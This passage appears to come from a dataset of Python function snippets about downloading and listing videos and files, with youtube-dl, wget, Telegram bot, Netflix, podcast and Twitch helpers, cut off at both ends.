errors.HttpError as error:\n os.remove(path) # Remove broken file\n print('Could not download file: {}'.format(error), file=sys.stderr)", "def download_files(self):", "def download_urls(urls_filename, reverse=True, log_filename='youtube-playlist-download.log'):\n urls_file = open(urls_filename)\n url_lines = urls_file.read().splitlines();\n urls_file.close()\n if reverse:\n url_lines = reversed(url_lines)\n\n logfile = open(log_filename, 'w')\n logfile.write('\\n' + str(datetime.now()) + '\\n')\n logfile.flush()\n\n # use -f best to avoid merging and just get the best overall format (saves time)\n youtube_cmd_with_args = ['youtube-dl', '--ignore-errors', '--ignore-config', '--write-info-json', '--no-mtime', '-f best', '-o ' + get_full_filename()]\n\n try:\n for line in url_lines:\n url_id, title = line.split('\\t')[:2]\n print('Downloading video: \"' + title + '\" with id \"' + url_id + '\"')\n run(youtube_cmd_with_args + [YT_PREFIX + url_id])\n print('Done downloading url:', url_id)\n notify('Done downloading url:' + url_id)\n logfile.write('Downloaded\\t' + url_id + '\\t' + title + '\\n')\n logfile.flush()\n except KeyboardInterrupt as e:\n print(\"Exiting\")\n logfile.close()\n\n logfile.close()", "async def download_video(v_url):\n reply = await v_url.get_reply_message()\n if v_url.pattern_match.group(2) != \"\":\n url = v_url.pattern_match.group(2)\n elif reply is not None:\n url = reply.message\n url = re.findall(r\"\\bhttps?://.*\\.\\S+\", reply.message)[0]\n else:\n return\n type = (\n v_url.pattern_match.group(1).lower()\n if v_url.pattern_match.group(1) is not None\n else \"a\"\n )\n await v_url.edit(\"`Preparing to download...`\")\n 
out_folder = Config.TMP_DOWNLOAD_DIRECTORY + \"youtubedl/\"\n Config.TMP_DOWNLOAD_DIRECTORY + \"/thumb_image.jpg\"\n if not os.path.isdir(out_folder):\n os.makedirs(out_folder)\n if type == \"a\":\n opts = {\n \"format\": \"bestaudio\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"key\": \"FFmpegMetadata\",\n \"writethumbnail\": True,\n \"embedthumbnail\": True,\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\n \"key\": \"FFmpegExtractAudio\",\n \"preferredcodec\": \"mp3\",\n \"preferredquality\": \"320\",\n }\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"quiet\": True,\n \"logtostderr\": False,\n }\n video = False\n song = True\n\n elif type == \"v\":\n opts = {\n \"format\": \"best\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"getthumbnail\": True,\n \"embedthumbnail\": True,\n \"xattrs\": True,\n \"writethumbnail\": True,\n \"key\": \"FFmpegMetadata\",\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\"key\": \"FFmpegVideoConvertor\", \"preferedformat\": \"mp4\"},\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"logtostderr\": False,\n \"quiet\": True,\n }\n song = False\n video = True\n\n try:\n await v_url.edit(\"`Fetching playlist data, please wait..`\")\n with YoutubeDL(opts) as ytdl:\n ytdl.extract_info(url)\n # print(ytdl_data['thumbnail'])\n filename = sorted(get_lst_of_files(out_folder, []))\n except DownloadError as DE:\n await v_url.edit(f\"`{str(DE)}`\")\n return\n except ContentTooShortError:\n await v_url.edit(\"`The download content was too short.`\")\n return\n except GeoRestrictedError:\n await v_url.edit(\n \"`Video is not available from your geographic location due to geographic restrictions imposed by a website.`\"\n )\n return\n except MaxDownloadsReached:\n await v_url.edit(\"`Max-downloads limit has been reached.`\")\n return\n except PostProcessingError:\n await v_url.edit(\"`There was an error during post processing.`\")\n return\n except UnavailableVideoError:\n await v_url.edit(\"`Media is not available in the requested format.`\")\n return\n except XAttrMetadataError as XAME:\n await v_url.edit(f\"`{XAME.code}: {XAME.msg}\\n{XAME.reason}`\")\n return\n except ExtractorError:\n await v_url.edit(\"`There was an error during info extraction.`\")\n return\n except Exception as e:\n await v_url.edit(f\"{str(type(e)): {str(e)}}\")\n return\n c_time = time.time()\n await v_url.edit(\"`YouTube Playlist Downloading Processing Now.\\nPlease Wait!`\")\n if song:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = True\n supports_streaming = False\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 180\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n try:\n ytdl_data_name_audio = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_audio[: (len(ytdl_data_name_audio) - 4)]\n + \".jpg\"\n )\n print(ytdl_data_name_audio)\n file_path = single_file\n song_size = file_size(file_path)\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_audio}`\"\n + 
\"\\n\"\n + f\"Size👉 {song_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n allow_cache=False,\n thumb=thumb,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_audio}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)\n if video:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = False\n supports_streaming = True\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 0\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n # print(ytdl_data)\n # for file in os.listdir(\"./DOWNLOADS/youtubedl/\"):\n # if file.endswith(\".jpg\"):\n # thumb = \"./DOWNLOADS/youtubedl/\" + file\n # print(os.path.join(\"./DOWNLOADS/youtubedl/\", file))\n # image_link = ytdl_data['thumbnail']\n # downloaded_image = wget.download(image_link,out_folder)\n # thumb = ytdl_data_name_video + \".jpg\"\n file_path = single_file\n video_size = file_size(file_path)\n try:\n ytdl_data_name_video = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_video[: (len(ytdl_data_name_video) - 4)]\n + \".jpg\"\n )\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_video}`\"\n + \"\\n\"\n + f\"Size👉 {video_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n thumb=thumb,\n allow_cache=False,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_video}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)", "def download(dltype, num):\n # This function needs refactoring!\n # pylint: disable=R0912\n # pylint: disable=R0914\n if g.browse_mode == \"ytpl\" and dltype in (\"da\", \"dv\"):\n plid = g.ytpls[int(num) - 1][\"link\"]\n down_plist(dltype, plid)\n return\n\n elif g.browse_mode == \"ytpl\":\n g.message = \"Use da or dv to specify audio / video playlist download\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n elif g.browse_mode != \"normal\":\n g.message = \"Download must refer to a specific video item\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n writestatus(\"Fetching video info...\")\n song = (g.model.songs[int(num) - 1])\n best = dltype.startswith(\"dv\") or dltype.startswith(\"da\")\n\n if not best:\n\n try:\n # user prompt for download stream\n url, ext, url_au, ext_au = prompt_dl(song)\n\n except KeyboardInterrupt:\n 
g.message = c.r + \"Download aborted!\" + c.w\n g.content = generate_songlist_display()\n return\n\n if not url or ext_au == \"abort\":\n # abort on invalid stream selection\n g.content = generate_songlist_display()\n g.message = \"%sNo download selected / invalid input%s\" % (c.y, c.w)\n return\n\n else:\n # download user selected stream(s)\n filename = _make_fname(song, ext)\n args = (song, filename, url)\n\n if url_au and ext_au:\n # downloading video and audio stream for muxing\n audio = False\n filename_au = _make_fname(song, ext_au)\n args_au = (song, filename_au, url_au)\n\n else:\n audio = ext in (\"m4a\", \"ogg\")\n\n kwargs = dict(audio=audio)\n\n elif best:\n # set updownload without prompt\n url_au = None\n av = \"audio\" if dltype.startswith(\"da\") else \"video\"\n audio = av == \"audio\"\n filename = _make_fname(song, None, av=av)\n args = (song, filename)\n kwargs = dict(url=None, audio=audio)\n\n try:\n # perform download(s)\n dl_filenames = [args[1]]\n f = _download(*args, **kwargs)\n if f:\n g.message = \"Saved to \" + c.g + f + c.w\n\n if url_au:\n dl_filenames += [args_au[1]]\n _download(*args_au, allow_transcode=False, **kwargs)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download halted!\" + c.w\n\n try:\n for downloaded in dl_filenames:\n os.remove(downloaded)\n\n except IOError:\n pass\n\n if url_au:\n # multiplex\n mux_cmd = \"APP -i VIDEO -i AUDIO -c copy OUTPUT\".split()\n mux_cmd = \"%s -i %s -i %s -c copy %s\"\n mux_cmd = [g.muxapp, \"-i\", args[1], \"-i\", args_au[1], \"-c\",\n \"copy\", args[1][:-3] + \"mp4\"]\n\n try:\n subprocess.call(mux_cmd)\n g.message = \"Saved to :\" + c.g + mux_cmd[7] + c.w\n os.remove(args[1])\n os.remove(args_au[1])\n\n except KeyboardInterrupt:\n g.message = \"Audio/Video multiplex aborted!\"\n\n g.content = generate_songlist_display()", "def download_video(video_stream):\n global file_size\n file_size = size_in_mb(video_stream.filesize)\n home_dir = os.environ['HOME']\n path = f'{home_dir}/Downloads/Video'\n print('-'*60)\n print(f'Filename:\\t{video_stream.title}')\n print(f'Location:\\t{path}')\n print(f'Size:\\t\\t{file_size} MB\\n')\n\n filename = video_stream.title + '_video.mp4'\n filename = filename.replace('/', ' ')\n filename = filename.replace('\\\\', ' ')\n\n if os.path.exists(os.path.join(path, filename)):\n print(\"The file has been already downloaded.\")\n sys.exit()\n \n video_stream.download(path, filename)", "def test_plenty_of_video_files():\n # make sure that there is one sequence per video file\n pipe = VideoPipe(\n batch_size=BATCH_SIZE, data=PLENTY_VIDEO_FILES, step=1000000, sequence_length=1)\n pipe.build()\n iters = math.ceil(len(os.listdir(PLENTY_VIDEO_DIRECTORY)) / BATCH_SIZE)\n for i in range(iters):\n print(\"Iter \" + str(i))\n pipe.run()", "def get_videos(channel_name, CLIENT_SECRETS_FILE):\r\n\r\n video_list = []\r\n\r\n MISSING_CLIENT_SECRETS_MESSAGE = \"WARNING: Please configure OAuth 2.0\"\r\n\r\n YOUTUBE_READONLY_SCOPE = \"https://www.googleapis.com/auth/youtube.readonly\"\r\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\r\n YOUTUBE_API_VERSION = \"v3\"\r\n\r\n flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,\r\n message=MISSING_CLIENT_SECRETS_MESSAGE,\r\n scope=YOUTUBE_READONLY_SCOPE)\r\n\r\n storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\r\n credentials = storage.get()\r\n\r\n if credentials is None or credentials.invalid:\r\n flags = argparser.parse_args()\r\n credentials = run_flow(flow, storage, flags)\r\n\r\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\r\n 
http=credentials.authorize(httplib2.Http()))\r\n\r\n # Retrieve the contentDetails part of the channel resource for the\r\n # authenticated user's channel.\r\n channels_response = youtube.channels().list(\r\n forUsername=channel_name,\r\n part=\"contentDetails\"\r\n ).execute()\r\n\r\n for channel in channels_response[\"items\"]:\r\n # From the API response, extract the playlist ID that identifies the list\r\n # of videos uploaded to the authenticated user's channel.\r\n uploads_list_id = channel[\"contentDetails\"][\"relatedPlaylists\"][\"uploads\"]\r\n\r\n # Retrieve the list of videos uploaded to the authenticated user's channel.\r\n playlistitems_list_request = youtube.playlistItems().list(\r\n playlistId=uploads_list_id,\r\n part=\"snippet\",\r\n maxResults=50\r\n )\r\n\r\n while playlistitems_list_request:\r\n playlistitems_list_response = playlistitems_list_request.execute()\r\n\r\n # Print information about each video.\r\n for playlist_item in playlistitems_list_response[\"items\"]:\r\n title = playlist_item[\"snippet\"][\"title\"]\r\n video_id = playlist_item[\"snippet\"][\"resourceId\"][\"videoId\"]\r\n video_list.append((title, video_id, 'https://img.youtube.com/vi/' + video_id + '/0.jpg'))\r\n\r\n playlistitems_list_request = youtube.playlistItems().list_next(\r\n playlistitems_list_request, playlistitems_list_response)\r\n\r\n return(video_list)", "def downloadFilesForDate(googleServices, settings, outputDir, hpwrenSource, gapMinutes, verboseLogs):\n startTimeDT = hpwrenSource['startTimeDT']\n endTimeDT = hpwrenSource['endTimeDT']\n dateDirName = '{year}{month:02d}{date:02d}'.format(year=startTimeDT.year, month=startTimeDT.month, date=startTimeDT.day)\n hpwrenSource['dateDirName'] = dateDirName\n urlPartsDate = hpwrenSource['urlParts'][:] # copy URL\n urlPartsDate.append(dateDirName)\n hpwrenSource['urlPartsDate'] = urlPartsDate\n\n timeGapDelta = datetime.timedelta(seconds = 60*gapMinutes)\n imgTimes = None\n lastQNum = 0 # 0 never matches because Q numbers start with 1\n curTimeDT = startTimeDT\n downloaded_files = []\n prevTime = None\n while curTimeDT <= endTimeDT:\n qNum = 1 + int(curTimeDT.hour/3)\n urlPartsQ = urlPartsDate[:] # copy URL\n urlPartsQ.append('Q' + str(qNum))\n if qNum != lastQNum:\n # List times of files in Q dir and cache\n useHttp = True\n imgTimes = listTimesinQ(urlPartsQ, verboseLogs)\n if not imgTimes:\n if verboseLogs:\n logging.error('No images in Q dir %s', '/'.join(urlPartsQ))\n mp4Url = getMp4Url(urlPartsDate, qNum, verboseLogs)\n if not mp4Url:\n return downloaded_files\n if outputDir != outputDirCheckOnly:\n imgTimes = getGCSMp4(googleServices, settings, hpwrenSource, qNum)\n useHttp = False\n # logging.warning('imgTimes %d %s', len(imgTimes), imgTimes)\n lastQNum = qNum\n\n if outputDir == outputDirCheckOnly:\n downloaded_files.append(outputDirCheckOnly)\n else:\n desiredTime = int(curTimeDT.timestamp())\n closestEntry = min(imgTimes, key=lambda x: abs(x['time']-desiredTime))\n closestTime = closestEntry['time']\n downloaded = None\n if closestTime != prevTime: # skip if closest timestamp is still same as previous iteration\n prevTime = closestTime\n if useHttp:\n downloaded = downloadHttpFileAtTime(outputDir, urlPartsQ, hpwrenSource['cameraID'], closestTime, verboseLogs)\n else:\n downloaded = downloadGCSFileAtTime(outputDir, closestEntry)\n if downloaded and verboseLogs:\n logging.warning('Successful download for time %s', str(datetime.datetime.fromtimestamp(closestTime)))\n if downloaded:\n downloaded_files.append(downloaded)\n\n curTimeDT 
+= timeGapDelta\n return downloaded_files", "def download(urls: List[str], num_threads: int = 40) -> List[str]:\n\n num_files = len(urls)\n start = perf_counter()\n\n print(\"Starting download of %s files . . .\" % num_files)\n\n results = multiprocess(urls, Downloader, num_threads=num_threads)\n\n dur = perf_counter() - start\n print(\"Completed download of %s files after %.3f seconds.\" % (num_files, dur))\n\n return results", "def download_file():\n for lines in urls:\n try:\n req.urlretrieve(lines, '{0}/{1}'.format(folder_path, lines.split('/')[-1]))\n time.sleep(1)\n print ('File - {} - downloaded successfully'.format(lines.split('/')[-1]))\n except urllib.error.HTTPError:\n print('File is missing or not reachable')\n print('Download Complete & Successful!')", "def download_files(valid_links: list) -> list:\n print('Starting process...')\n print('')\n\n year_month_filepath = []\n\n for link_info in valid_links:\n\n # Get file extension\n extension = link_info[0].split('.')[-1]\n\n # Link to download\n link_to_download = link_info[0]\n\n # Get month\n month = link_info[1]\n\n # Get year\n year = link_info[2]\n\n # Create a standard filename to save\n file_name = f'{year}-{month}.{extension}'\n\n print(f'Downloading... {link_to_download} Saving... {file_name}')\n\n # Create a link to save into ./file directory\n link_to_save = f'./file/{file_name}'\n\n # Download file and save it\n wget.download(link_to_download, out=link_to_save)\n\n\n # Special treatment to zip and xlsx file\n if extension == 'zip':\n\n # Get right link to save (.csv) from zip function\n link_to_save = get_file_into_zip(link_to_save)\n\n elif extension == 'xlsx':\n # Get right link to save (.csv) from xlsx function\n link_to_save = excel2csv(link_to_save)\n\n # Include the tuple into a list\n year_month_filepath.append((year, month, link_to_save))\n\n print('Finishing process...')\n\n return year_month_filepath", "def fetch_video_list (self, list_id, list_from=0, list_to=FETCH_VIDEO_REQUEST_COUNT):\n paths = [\n ['lists', list_id, {'from': list_from, 'to': list_to}, ['summary', 'title', 'synopsis', 'regularSynopsis', 'evidence', 'queue', 'episodeCount', 'info', 'maturity', 'runtime', 'seasonCount', 'releaseYear', 'userRating', 'numSeasonsLabel', 'bookmarkPosition', 'watched', 'videoQuality']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'cast', {'from': 0, 'to': 15}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'cast', 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'genres', {'from': 0, 'to': 5}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'genres', 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'tags', {'from': 0, 'to': 9}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'tags', 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, ['creators', 'directors'], {'from': 0, 'to': 49}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, ['creators', 'directors'], 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'bb2OGLogo', '_400x90', 'png'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'boxarts', '_342x192', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'boxarts', '_1280x720', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'storyarts', '_1632x873', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'interestingMoment', '_665x375', 'jpg'],\n ['lists', list_id, 
{'from': list_from, 'to': list_to}, 'artWorkByType', 'BILLBOARD', '_1280x720', 'jpg']\n ]\n\n response = self._path_request(paths=paths)\n return self._process_response(response=response, component='Video list')", "def start(self):\n\n ydl_opts = {}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n while True:\n videos = self.get_videos() # getting list of all videos from file\n print('{} videos to go'.format(len(videos))) # print no. of video remaining\n video = get_first_item(videos) # get next video for downloading\n if video is None: # check if video is there or not\n break\n\n ydl.download([video]) # downloading video\n videos.remove(video) # remove video from list\n self.save_file(videos) # save updated list to file\n\n print('All downloaded')", "def get_videos_of_folder(folder):\n\n Settings.dev_print(\"getting videos of folder: {}\".format(folder.get_title()))\n if not folder: return []\n videos = []\n files = []\n valid_videos = [\".mp4\",\".mov\"]\n for f in os.listdir(folder.get_path()):\n ext = os.path.splitext(f)[1]\n if ext.lower() not in valid_videos:\n continue\n file = File()\n setattr(file, \"path\", os.path.join(folder.get_path(),f))\n files.append(file)\n Settings.maybe_print(\"video path: {}\".format(os.path.join(folder.get_path(),f)))\n return files", "def downloadAllVideos(train_csv_path, train_data_dir):\n\n vid2genre = {}\n with open(train_csv_path, 'r') as fin:\n lines = [line for line in fin.readlines() if not line.startswith('#')]\n print('start downloading %d videos' % len(lines))\n # use multiprocessing pool\n pool = multiprocessing.Pool(16)\n for i, line in enumerate(lines):\n # Extract the words consisting of video_id, start_time, end_time, list of video_tags\n words = [word.replace(\"\\n\", \"\").replace('\"', '') for word in line.replace(\" \", \"\").split(\",\")]\n words = words[0:3] + [words[3:]]\n video_id = words[0]\n vid2genre[video_id] = words[-1]\n pool.apply_async(download_vid, (line, train_data_dir))\n\n pool.close()\n pool.join()\n return vid2genre", "def downloadLocal(url_list,path):\n print(\"You are downloading {} images\".format(parser_arguments().limit),end=\" \");print(\"of {} class.\".format(parser_arguments().classes))\n print(\"Please, be patient :)\")\n for i in range(len(url_list)):\n filename= url_list[i].split(\"/\")[-1] # name of the picture file\n r = requests.get(url_list[i], stream =True)\n print(filename)\n\n with open(filename,'wb') as f : # create the file locally in binary-write mode\n r = requests.get(url_list[i], stream =True)\n shutil.copyfileobj(r.raw, f) #write our image to the file\n shutil.move(filename,path)\n print('Done!')", "def getVideoFilesFromFileList(filelist):\n videoFileList = []\n for videoFile in filenames:\n videoRoot, videoExt = os.path.splitext(videoFile)\n if videoExt in ['.mov', '.mp4', '.mkv', '.avi']:\n videoFileList.append(videoFile)\n return videoFileList", "def fetch_video_list(self, params):\n list_id = params.get('list_id', [''])[0]\n start = int(params.get('list_from', [0])[0])\n end = int(params.get('list_to', [26])[0])\n raw_video_list = self.netflix_session.fetch_video_list(\n list_id=list_id,\n list_from=start,\n list_to=end)\n if 'error' in raw_video_list:\n return raw_video_list\n # parse the video list ids\n if 'videos' in raw_video_list.get('value', {}).keys():\n video_list = self.netflix_session.parse_video_list(\n response_data=raw_video_list)\n return video_list\n return []", "def outputs(folderName):\n for i in itertools.count(1):\n yield io.open('%s/Video_%s.h264' %\n (folderName,\n 
datetime.now().strftime('%Y_%m_%d_%H_%M_%S')),\n 'wb')", "def podcast_download(self):\r\n warnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n now = datetime.datetime.now()\r\n\r\n for podcast_file in self.podcast_list:\r\n published, name, link, title = podcast_file\r\n if self.podcast_list != []:\r\n line_file = (published + ';' + title + ';' + name + ';' + link).encode(\"utf-8\") \r\n if line_file in open(self.download_log).read():\r\n pass\r\n else:\r\n title = unicodedata.normalize('NFKD', title).encode('ascii', 'ignore')\r\n download_folder = os.path.join('downloads', title)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n try:\r\n published = str(parser.parse(published))[:10]\r\n except IOError as error:\r\n print 'Error' + (error) + ': File - ' + str(title)\r\n download_folder = os.path.join(download_folder, published)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n namefile_unicode = link[link.rfind('/')+1:]\r\n namefile_str = unicodedata.normalize('NFKD', \r\n namefile_unicode).encode('ascii', 'ignore')\r\n namefile_str = namefile_str.decode('utf-8', 'ignore').encode(\"utf-8\")\r\n if '.mp3' in namefile_str:\r\n len_name = namefile_str.index('.mp3')\r\n elif '.MP3' in namefile_str:\r\n len_name = namefile_str.index('.MP3')\r\n namefile_str = namefile_str[:len_name + 4]\r\n fileoutput = os.path.join(download_folder, namefile_str)\r\n name = unicodedata.normalize('NFKD', name).encode('ascii', 'ignore')\r\n print str(published) + '; ' + name\r\n ## downlink\r\n download_file(link, fileoutput) \r\n ## tagging\r\n mp3_tagging(fileoutput, podcast_file)\r\n ## write log\r\n write_file(self.download_log, line_file)\r\n end = datetime.datetime.now()\r\n print '\\r' + 'Download Time = ' + str(end-now) + '\\r'\r\n return None", "def run(self, thread_count=2):\n trycount = 10\n numprefix = '{0:0%dd}' % len(str(thread_count))\n vidprefix = '{0:0%dd}' % len(str(len(self.titles)))\n\n def downloader(thread_num):\n \"\"\"A thread that runs the download\"\"\"\n tid = 'Thread ' + numprefix.format(thread_num) + ': '\n for i in range(thread_num, len(self.titles), thread_count):\n title, link = self.titles[i], self.download_urls[i]\n name = vidprefix.format(i) + ' ' + title + '.mp4'\n tries = 0\n while (not os.path.exists(name) or os.path.getsize(name) == 0) \\\n and tries <= trycount:\n if os.path.exists(name): os.remove(name)\n self.log(tid + 'Calling wget for ' + name)\n subprocess.call(['wget', '--output-document=' + name, link])\n tries += 1\n if (not os.path.exists(name) or os.path.getsize(name) == 0):\n self.log(tid + 'wget failed for ' + name)\n else:\n self.log(tid + 'wget successfully downloaded ' + name)\n\n threads = []\n for i in range(thread_count):\n threads.append(threading.Thread(target=downloader, args=(i,)))\n self.log('Thread ' + numprefix.format(i) + ' created')\n\n for i in range(thread_count):\n threads[i].start()\n self.log('Thread ' + numprefix.format(i) + ' started')\n\n for t in threads: t.join()\n self.log('Threads terminated')\n self.log('Downloads completed')", "def create_task_list(path_list):\n current_video_id = Video.objects.all().aggregate(Max('video_id'))['video_id__max']\n if not current_video_id:\n current_video_id = 0\n\n task_list = []\n for (path, rating) in path_list:\n base_path = os.path.split(path)[0]\n if os.path.isfile(path):\n file_name = os.path.basename(path)\n if is_valid_video_file(path, file_name):\n video_id, current_video_id = next_video_id(current_video_id, path)\n 
task_list.append(ImportTask(video_id, base_path, path, rating))\n continue\n for (root, dirs, files) in os.walk(path):\n for file_name in files:\n try:\n file_path = os.path.join(root, file_name)\n if os.path.isdir(file_path):\n continue\n if is_valid_video_file(file_path, file_name):\n video_id, current_video_id = next_video_id(current_video_id, file_path)\n task_list.append(ImportTask(video_id, base_path, file_path, rating))\n except:\n log.error('#Error while proceeding: {0}'.format(file_name))\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback, limit=2, file=sys.stdout)\n return task_list", "def download_video(video_url, output_path, output_name=\"\", default_type=\"mp4\", verbose=False):\n try:\n if \".\" not in output_name:\n output_name = f\"{output_name}.{default_type}\"\n output_path = os.path.join(output_path, output_name)\n api_response = core.get_request_with_retries(video_url)\n core_utils.print_if_verbose('Processing...', verbose)\n f = open(output_path, 'wb')\n for chunk in api_response.iter_content(chunk_size=255):\n # filter out keep-alive new chunks\n if chunk:\n f.write(chunk)\n core_utils.print_if_verbose(f'The video has been exported here: {output_path}', verbose)\n f.close()\n except Exception as exception_msg:\n print(f\"The video could not be downloaded due to the following error: {exception_msg}\")\n return", "def index():\n seen = set()\n seen_add = seen.add\n videos = []\n all_videos = mythVideo.searchVideos(insertedafter = '1900-01-01 00:00:00')\n\n for video in all_videos:\n path = video.filename.split('/')[0]\n if path not in seen and not seen_add(path):\n video.url = url_for('.with_path', path=path)\n video.label = path\n videos.append(video)\n\n videos = sorted(videos, key = lambda video: video.label.lowercase())\n return render_template('list.html', items = videos, page_title = 'Videos')", "def downloadvideo(filename):\n url = \"http://openings.moe/video/\" + filename\n f = getfile(url)\n safeprint(Colors.PURPLE + url + Colors.END + \":\\nSaving to --> \" + Colors.YELLOW + filename + Colors.END)\n with open(os.path.basename(url), \"wb\") as local_file:\n try:\n local_file.write(f.read())\n except IOError as e:\n safeprint(\"An error occurred while saving the file, try again. \" + str(e))", "async def get_videos(channel=None, limit=10, broadcasts=False):\n\tchannelid = get_user(name=channel or config[\"channel\"]).id\n\theaders = {\n\t\t'Client-ID': config['twitch_clientid'],\n\t\t'Authorization': f\"Bearer {get_token()}\",\n\t}\n\tdata = await common.http.request_coro(\"https://api.twitch.tv/helix/videos\", headers=headers, data={\n\t\t\"user_id\": channelid,\n\t\t\"first\": str(limit),\n\t\t\"sort\": \"time\",\n\t\t\"type\": \"archive\" if broadcasts else \"highlight\",\n\t})\n\treturn json.loads(data)[\"data\"]", "def get_videos_in_playlist(self):\n\n self.ydl = youtube_dl.YoutubeDL()\n # uses the youtube_dl as a context manager\n with self.ydl:\n self.result = self.ydl.extract_info(\n self.url, extra_info={'listformats': True}, download=False)\n for video in (self. result['entries']):\n video_id = video['id']\n self. url = f'https://www.youtube.com/watch?v={video_id}'\n self. 
show_formats()", "def download(query, destination='', max_items=None):\n destination = os.path.join(destination, query)\n eol_id = search(query)\n urls = []\n for idx, url in enumerate(get_images(eol_id)):\n filepath = os.path.join(destination, str(idx))\n data.download_image(url, filepath)\n print(idx)\n if max_items and idx >= max_items:\n break", "def with_path(path):\n seen = set()\n seen_add = seen.add\n videos = []\n all_videos = list(mythVideo.searchVideos(filename = path))\n\n for video in all_videos:\n if video.season > 0:\n video.label = video.title + \" - Season \" + str(video.season)\n\n if video.label not in seen and not seen_add(video.label):\n video.url = \"/videos/\" + video.title + \"/season/\" + str(video.season)\n videos.append(video)\n\n else:\n video.label = video.title + \" - \" + video.subtitle\n video.url = \"/videos/\" + video.title + \"/\" + video.hash\n videos.append(video)\n\n if len(videos) == 1:\n videos[0].pic = url_for('.video_image', title = title, hash = videos[0].hash)\n videos[0].feplay = url_for('.video_feplay', title = title, hash = hash)\n return render_template('recording.html', item = videos[0])\n\n videos = sorted(videos, key = lambda video: video.season)\n return render_template('list.html', items = videos, page_title = title)", "def download_feed_item(feed_item, base_directory):\n join_path = partial(os.path.join, base_directory)\n\n base_filename = base_filename_for_feed_item(feed_item)\n\n json_filename = join_path(\"{}.json\".format(base_filename))\n\n if os.path.exists(json_filename):\n # Stop here, we already have this video.\n return\n\n content = highest_quality_content(\n download_info_for_feed_item(feed_item)\n )\n\n video_content = (\n content[0]\n if isinstance(content, tuple) else\n content\n )\n\n assert video_content.media_type.has_video\n\n video_filename = join_path(\"{}.{}\".format(\n base_filename, video_content.media_type.file_type\n ))\n\n if os.path.exists(video_filename):\n # Delete the video file if it's there already.\n os.remove(video_filename)\n\n if isinstance(content, tuple):\n # Download video and audio at the same time.\n que = Queue()\n exception_queue = Queue()\n\n def download_in_queue():\n try:\n download_to_file(*que.get())\n except Exception as ex:\n exception_queue.put(ex)\n\n # TODO: It would be nice to be able to terminate the other\n # thread here.\n\n if isinstance(ex, (KeyboardInterrupt, 